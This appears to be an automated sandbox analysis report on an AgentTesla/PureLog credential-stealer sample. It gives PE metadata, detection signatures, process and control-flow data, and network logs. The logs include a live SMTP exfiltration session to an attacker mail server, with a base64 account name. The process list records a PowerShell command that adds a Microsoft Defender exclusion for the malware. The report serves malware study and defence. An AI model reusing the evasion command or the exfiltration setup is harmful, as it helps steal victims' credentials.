                                                  SHA512:5156120fe64a325f2bfee3bd0cfa83c58a85ceaee6438bfeb99d67d0f7145e9cd27b5186cea7602de78702734bcbddb2df39ea5ab05d8257e95d46f3212ce7e2
                                                  SSDEEP:12288:fCb+eCSmzBzzNzaXLerqtqgVSCXcPLbxUdOO/2yd:GCjhO2qtqQSCXQLdUL2O
                                                  TLSH:0CD40141626AD803E5D65BB04871E3BA27B95ECDB811D3138BEDBCFB3C26305745A282
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2Eg..............0.............6.... ........@.. .......................`............@................................
                                                  Icon Hash:322e2e3eee6e2697
                                                  Entrypoint:0x49e736
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x674532A8 [Tue Nov 26 02:30:00 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x9e6e40x4f.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xa00000x2a6c.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa40000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x9c73c0x9c80098e8e208c0fe9482a705c3e32eaa352eFalse0.8999460238618211data7.70390040559928IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0xa00000x2a6c0x2c0090710c9210a3aa3f232fc04f8cdc8d19False0.8670099431818182data7.468078490301163IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xa40000xc0x2004126663bb35900897dd883cb1ce259e0False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0xa01000x241dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9700378583017848
                                                  RT_GROUP_ICON0xa25300x14data1.05
                                                  RT_VERSION0xa25540x318data0.4431818181818182
                                                  RT_MANIFEST0xa287c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                  DLLImport
                                                  mscoree.dll_CorExeMain
                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-11-26T08:24:47.127193+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.849708199.79.62.115587TCP
                                                  2024-11-26T08:24:47.127193+01002839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity1192.168.2.849708199.79.62.115587TCP
                                                  2024-11-26T08:24:47.127193+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.849708199.79.62.115587TCP
                                                  2024-11-26T08:24:59.900079+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.849708199.79.62.115587TCP
                                                  2024-11-26T08:24:59.900079+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.849708199.79.62.115587TCP
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 26, 2024 08:24:56.045084953 CET49708587192.168.2.8199.79.62.115
                                                  Nov 26, 2024 08:24:56.165086031 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:24:56.165174961 CET49708587192.168.2.8199.79.62.115
                                                  Nov 26, 2024 08:24:57.400240898 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:24:57.401287079 CET49708587192.168.2.8199.79.62.115
                                                  Nov 26, 2024 08:24:57.521253109 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:24:57.786710024 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:24:57.811167955 CET49708587192.168.2.8199.79.62.115
                                                  Nov 26, 2024 08:24:57.931246996 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:24:58.196953058 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:24:58.198482037 CET49708587192.168.2.8199.79.62.115
                                                  Nov 26, 2024 08:24:58.318669081 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:24:58.713938951 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:24:58.714211941 CET49708587192.168.2.8199.79.62.115
                                                  Nov 26, 2024 08:24:58.834247112 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:24:59.099586964 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:24:59.100312948 CET49708587192.168.2.8199.79.62.115
                                                  Nov 26, 2024 08:24:59.220397949 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:24:59.513829947 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:24:59.514055014 CET49708587192.168.2.8199.79.62.115
                                                  Nov 26, 2024 08:24:59.634016037 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:24:59.899275064 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:24:59.900015116 CET49708587192.168.2.8199.79.62.115
                                                  Nov 26, 2024 08:24:59.900079012 CET49708587192.168.2.8199.79.62.115
                                                  Nov 26, 2024 08:24:59.900091887 CET49708587192.168.2.8199.79.62.115
                                                  Nov 26, 2024 08:24:59.900121927 CET49708587192.168.2.8199.79.62.115
                                                  Nov 26, 2024 08:25:00.020036936 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:25:00.020054102 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:25:00.020106077 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:25:00.020118952 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:25:00.391987085 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:25:00.439703941 CET49708587192.168.2.8199.79.62.115
                                                  Nov 26, 2024 08:26:33.205810070 CET49708587192.168.2.8199.79.62.115
                                                  Nov 26, 2024 08:26:33.325824976 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:26:33.791990995 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:26:33.792117119 CET58749708199.79.62.115192.168.2.8
                                                  Nov 26, 2024 08:26:33.792206049 CET49708587192.168.2.8199.79.62.115
                                                  Nov 26, 2024 08:26:33.792313099 CET49708587192.168.2.8199.79.62.115
                                                  Nov 26, 2024 08:26:33.912513971 CET58749708199.79.62.115192.168.2.8
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Nov 26, 2024 08:24:53.181953907 CET5571453192.168.2.81.1.1.1
                                                  Nov 26, 2024 08:24:54.210338116 CET5571453192.168.2.81.1.1.1
                                                  Nov 26, 2024 08:24:55.221044064 CET5571453192.168.2.81.1.1.1
                                                  Nov 26, 2024 08:24:56.038043976 CET53557141.1.1.1192.168.2.8
                                                  Nov 26, 2024 08:24:56.038081884 CET53557141.1.1.1192.168.2.8
                                                  Nov 26, 2024 08:24:56.038091898 CET53557141.1.1.1192.168.2.8
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Nov 26, 2024 08:24:53.181953907 CET192.168.2.81.1.1.10xa4caStandard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                                  Nov 26, 2024 08:24:54.210338116 CET192.168.2.81.1.1.10xa4caStandard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                                  Nov 26, 2024 08:24:55.221044064 CET192.168.2.81.1.1.10xa4caStandard query (0)mail.mbarieservicesltd.comA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Nov 26, 2024 08:24:56.038043976 CET1.1.1.1192.168.2.80xa4caNo error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                                  Nov 26, 2024 08:24:56.038081884 CET1.1.1.1192.168.2.80xa4caNo error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                                  Nov 26, 2024 08:24:56.038091898 CET1.1.1.1192.168.2.80xa4caNo error (0)mail.mbarieservicesltd.com199.79.62.115A (IP address)IN (0x0001)false
                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                  Nov 26, 2024 08:24:57.400240898 CET58749708199.79.62.115192.168.2.8220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Tue, 26 Nov 2024 12:54:57 +0530
                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                  220 and/or bulk e-mail.
                                                  Nov 26, 2024 08:24:57.401287079 CET49708587192.168.2.8199.79.62.115EHLO 494126
                                                  Nov 26, 2024 08:24:57.786710024 CET58749708199.79.62.115192.168.2.8250-md-54.webhostbox.net Hello 494126 [8.46.123.75]
                                                  250-SIZE 52428800
                                                  250-8BITMIME
                                                  250-PIPELINING
                                                  250-PIPECONNECT
                                                  250-AUTH PLAIN LOGIN
                                                  250-STARTTLS
                                                  250 HELP
                                                  Nov 26, 2024 08:24:57.811167955 CET49708587192.168.2.8199.79.62.115AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                                                  Nov 26, 2024 08:24:58.196953058 CET58749708199.79.62.115192.168.2.8334 UGFzc3dvcmQ6
                                                  Nov 26, 2024 08:24:58.713938951 CET58749708199.79.62.115192.168.2.8235 Authentication succeeded
                                                  Nov 26, 2024 08:24:58.714211941 CET49708587192.168.2.8199.79.62.115MAIL FROM:<saless@mbarieservicesltd.com>
                                                  Nov 26, 2024 08:24:59.099586964 CET58749708199.79.62.115192.168.2.8250 OK
                                                  Nov 26, 2024 08:24:59.100312948 CET49708587192.168.2.8199.79.62.115RCPT TO:<iinfo@mbarieservicesltd.com>
                                                  Nov 26, 2024 08:24:59.513829947 CET58749708199.79.62.115192.168.2.8250 Accepted
                                                  Nov 26, 2024 08:24:59.514055014 CET49708587192.168.2.8199.79.62.115DATA
                                                  Nov 26, 2024 08:24:59.899275064 CET58749708199.79.62.115192.168.2.8354 Enter message, ending with "." on a line by itself
                                                  Nov 26, 2024 08:24:59.900121927 CET49708587192.168.2.8199.79.62.115.
                                                  Nov 26, 2024 08:25:00.391987085 CET58749708199.79.62.115192.168.2.8250 OK id=1tFpwR-002w7F-2E
                                                  Nov 26, 2024 08:26:33.205810070 CET49708587192.168.2.8199.79.62.115QUIT
                                                  Nov 26, 2024 08:26:33.791990995 CET58749708199.79.62.115192.168.2.8221 md-54.webhostbox.net closing connection

                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:02:24:48
                                                  Start date:26/11/2024
                                                  Path:C:\Users\user\Desktop\Quote1000AFC.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\Quote1000AFC.exe"
                                                  Imagebase:0x970000
                                                  File size:653'312 bytes
                                                  MD5 hash:C8EA824FA0E80350B1412B84455E65FE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1489117798.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.1482260990.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1482260990.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:02:24:49
                                                  Start date:26/11/2024
                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote1000AFC.exe"
                                                  Imagebase:0x3d0000
                                                  File size:433'152 bytes
                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:02:24:49
                                                  Start date:26/11/2024
                                                  Path:C:\Users\user\Desktop\Quote1000AFC.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\Quote1000AFC.exe"
                                                  Imagebase:0xda0000
                                                  File size:653'312 bytes
                                                  MD5 hash:C8EA824FA0E80350B1412B84455E65FE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2702375590.000000000316A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.2700732625.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2702375590.0000000003111000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2702375590.0000000003111000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:5
                                                  Start time:02:24:49
                                                  Start date:26/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:02:24:52
                                                  Start date:26/11/2024
                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                  Imagebase:0x7ff605670000
                                                  File size:496'640 bytes
                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                  Has elevated privileges:true
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:10.8%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:10.4%
                                                    Total number of Nodes:77
                                                    Total number of Limit Nodes:5
                                                    execution_graph 27289 2c0d2e0 27290 2c0d326 27289->27290 27294 2c0d4c0 27290->27294 27297 2c0d4b0 27290->27297 27291 2c0d413 27300 2c0af34 27294->27300 27298 2c0d4ee 27297->27298 27299 2c0af34 DuplicateHandle 27297->27299 27298->27291 27299->27298 27301 2c0d528 DuplicateHandle 27300->27301 27302 2c0d4ee 27301->27302 27302->27291 27323 2c0af50 27324 2c0af5f 27323->27324 27327 2c0b037 27323->27327 27337 2c0b048 27323->27337 27328 2c0b048 27327->27328 27331 2c0b07c 27328->27331 27347 2c09ab8 27328->27347 27331->27324 27332 2c0b280 GetModuleHandleW 27334 2c0b2ad 27332->27334 27333 2c0b074 27333->27331 27333->27332 27334->27324 27338 2c0b059 27337->27338 27341 2c0b07c 27337->27341 27339 2c09ab8 GetModuleHandleW 27338->27339 27340 2c0b064 27339->27340 27340->27341 27345 2c0b2d0 GetModuleHandleW 27340->27345 27346 2c0b2e0 GetModuleHandleW 27340->27346 27341->27324 27342 2c0b074 27342->27341 27343 2c0b280 GetModuleHandleW 27342->27343 27344 2c0b2ad 27343->27344 27344->27324 27345->27342 27346->27342 27349 2c0b238 GetModuleHandleW 27347->27349 27350 2c0b064 27349->27350 27350->27331 27351 2c0b2e0 27350->27351 27354 2c0b2d0 27350->27354 27352 2c09ab8 GetModuleHandleW 27351->27352 27353 2c0b2f4 27351->27353 27352->27353 27353->27333 27355 2c09ab8 GetModuleHandleW 27354->27355 27356 2c0b2f4 27355->27356 27356->27333 27357 71d0368 27358 71d03a2 27357->27358 27359 71d0433 27358->27359 27363 71d0460 27358->27363 27368 71d0452 27358->27368 27360 71d0429 27364 71d048e 27363->27364 27365 71d08e5 27363->27365 27364->27365 27373 71d0d78 27364->27373 27380 71d0d88 27364->27380 27365->27360 27369 71d0454 27368->27369 27370 71d08e5 27369->27370 27371 71d0d78 2 API calls 27369->27371 27372 71d0d88 2 API calls 27369->27372 27370->27360 27371->27370 27372->27370 27378 71d0d78 CreateIconFromResourceEx 27373->27378 27379 71d0d88 CreateIconFromResourceEx 27373->27379 27374 71d0da2 27375 71d0daf 27374->27375 27376 71d0dc7 CreateIconFromResourceEx 27374->27376 27375->27365 27377 71d0e56 27376->27377 27377->27365 27378->27374 27379->27374 27381 71d0da2 27380->27381 27385 71d0d78 CreateIconFromResourceEx 27380->27385 27386 71d0d88 CreateIconFromResourceEx 27380->27386 27382 71d0daf 27381->27382 27383 71d0dc7 CreateIconFromResourceEx 27381->27383 27382->27365 27384 71d0e56 27383->27384 27384->27365 27385->27381 27386->27381 27303 2c04668 27304 2c04672 27303->27304 27306 2c04758 27303->27306 27307 2c0477d 27306->27307 27311 2c04858 27307->27311 27315 2c04868 27307->27315 27313 2c04868 27311->27313 27312 2c0496c 27312->27312 27313->27312 27319 2c044b4 27313->27319 27316 2c0488f 27315->27316 27317 2c044b4 CreateActCtxA 27316->27317 27318 2c0496c 27316->27318 27317->27318 27320 2c058f8 CreateActCtxA 27319->27320 27322 2c059af 27320->27322
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1489610557.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_71d0000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 522fc4cea880617e4097f6bee1736dc62fb32f65ecbf5f50452bb46dba5e01bc
                                                    • Instruction ID: e330bbf37e42afd174caa6a09c080fe039d9ad73ab8d144692afc3f3f9f3dedb
                                                    • Opcode Fuzzy Hash: 522fc4cea880617e4097f6bee1736dc62fb32f65ecbf5f50452bb46dba5e01bc
                                                    • Instruction Fuzzy Hash: D543D9B4A00219DFDB25DF68C898A9DBBB6FF89310F158195D409AB3A1DB31ED81CF50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1489610557.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_71d0000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3b6b9c0ff51f8f6f549a48f1c603b48dfdd6e2944b48ba1088deeeb174fbbac5
                                                    • Instruction ID: 25f8413c7adf65004eb41d1859c11e79e207835c2ca5f7b5a91d53451f088bdc
                                                    • Opcode Fuzzy Hash: 3b6b9c0ff51f8f6f549a48f1c603b48dfdd6e2944b48ba1088deeeb174fbbac5
                                                    • Instruction Fuzzy Hash: BA5250B5A00216DFDB19DF69C484AADBBB2BF89710B158169E805DB3E0DB31EC01CF91

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1445 71d0460-71d0488 1446 71d048e-71d0493 1445->1446 1447 71d096b-71d09d4 1445->1447 1446->1447 1448 71d0499-71d04b6 1446->1448 1455 71d09db-71d0a63 1447->1455 1454 71d04bc-71d04c0 1448->1454 1448->1455 1456 71d04cf-71d04d3 1454->1456 1457 71d04c2-71d04cc 1454->1457 1491 71d0a6e-71d0aee 1455->1491 1459 71d04d5-71d04df 1456->1459 1460 71d04e2-71d04e9 1456->1460 1457->1456 1459->1460 1463 71d04ef-71d051f 1460->1463 1464 71d0604-71d0609 1460->1464 1473 71d0cee-71d0d14 1463->1473 1475 71d0525-71d05f8 1463->1475 1468 71d060b-71d060f 1464->1468 1469 71d0611-71d0616 1464->1469 1468->1469 1471 71d0618-71d061c 1468->1471 1472 71d0628-71d0658 1469->1472 1471->1473 1474 71d0622-71d0625 1471->1474 1472->1491 1492 71d065e-71d0661 1472->1492 1484 71d0d24 1473->1484 1485 71d0d16-71d0d22 1473->1485 1474->1472 1475->1464 1500 71d05fa 1475->1500 1486 71d0d27-71d0d2c 1484->1486 1485->1486 1508 71d0af5-71d0b77 1491->1508 1492->1491 1495 71d0667-71d0669 1492->1495 1495->1491 1497 71d066f-71d06a4 1495->1497 1507 71d06aa-71d06b3 1497->1507 1497->1508 1500->1464 1510 71d06b9-71d0713 1507->1510 1511 71d0816-71d081a 1507->1511 1512 71d0b7f-71d0c01 1508->1512 1550 71d0725 1510->1550 1551 71d0715-71d071e 1510->1551 1511->1512 1513 71d0820-71d0824 1511->1513 1516 71d0c09-71d0c36 1512->1516 1513->1516 1517 71d082a-71d0830 1513->1517 1528 71d0c3d-71d0cbd 1516->1528 1519 71d0834-71d0869 1517->1519 1520 71d0832 1517->1520 1524 71d0870-71d0876 1519->1524 1520->1524 1524->1528 1529 71d087c-71d0884 1524->1529 1585 71d0cc4-71d0ce6 1528->1585 1534 71d088b-71d088d 1529->1534 1535 71d0886-71d088a 1529->1535 1539 71d08ef-71d08f5 1534->1539 1540 71d088f-71d08b3 1534->1540 1535->1534 1546 71d0914-71d0942 1539->1546 1547 71d08f7-71d0912 1539->1547 1571 71d08bc-71d08c0 1540->1571 1572 71d08b5-71d08ba 1540->1572 1567 71d094a-71d0956 1546->1567 1547->1567 1556 71d0729-71d072b 1550->1556 1551->1556 1557 71d0720-71d0723 1551->1557 1563 71d072d 1556->1563 1564 71d0732-71d0736 1556->1564 1557->1556 1563->1564 1569 71d0738-71d073f 1564->1569 1570 71d0744-71d074a 1564->1570 1584 71d095c-71d0968 1567->1584 1567->1585 1579 71d07e1-71d07e5 1569->1579 1573 71d074c-71d0752 1570->1573 1574 71d0754-71d0759 1570->1574 1571->1473 1578 71d08c6-71d08c9 1571->1578 1581 71d08cc-71d08dd 1572->1581 1582 71d075f-71d0765 1573->1582 1574->1582 1578->1581 1586 71d0804-71d0810 1579->1586 1587 71d07e7-71d0801 1579->1587 1621 71d08df call 71d0d78 1581->1621 1622 71d08df call 71d0d88 1581->1622 1591 71d076b-71d0770 1582->1591 1592 71d0767-71d0769 1582->1592 1585->1473 1586->1510 1586->1511 1587->1586 1588 71d08e5-71d08ed 1588->1567 1596 71d0772-71d0784 1591->1596 1592->1596 1602 71d078e-71d0793 1596->1602 1603 71d0786-71d078c 1596->1603 1604 71d0799-71d07a0 1602->1604 1603->1604 1606 71d07a6 1604->1606 1607 71d07a2-71d07a4 1604->1607 1611 71d07ab-71d07b6 1606->1611 1607->1611 1613 71d07b8-71d07bb 1611->1613 1614 71d07da 1611->1614 1613->1579 1616 71d07bd-71d07c3 1613->1616 1614->1579 1617 71d07ca-71d07d3 1616->1617 1618 71d07c5-71d07c8 1616->1618 1617->1579 1620 71d07d5-71d07d8 1617->1620 1618->1614 1618->1617 1620->1579 1620->1614 1621->1588 1622->1588
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1489610557.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_71d0000_Quote1000AFC.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 617a72351dc903b1785ead7082cbadf02ee8e893d3f9dd7b5fc8ea52310098a2
                                                    • Instruction ID: f60acfb49f203dcba4ec9a79c63237ac287993d7a80607fbbb4b1c0cbd43a164
                                                    • Opcode Fuzzy Hash: 617a72351dc903b1785ead7082cbadf02ee8e893d3f9dd7b5fc8ea52310098a2
                                                    • Instruction Fuzzy Hash: 3F326F70E102188FDB55DFA9C8947AEBBB6AFC8300F1485AAD449AB385DF349C45CF91

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
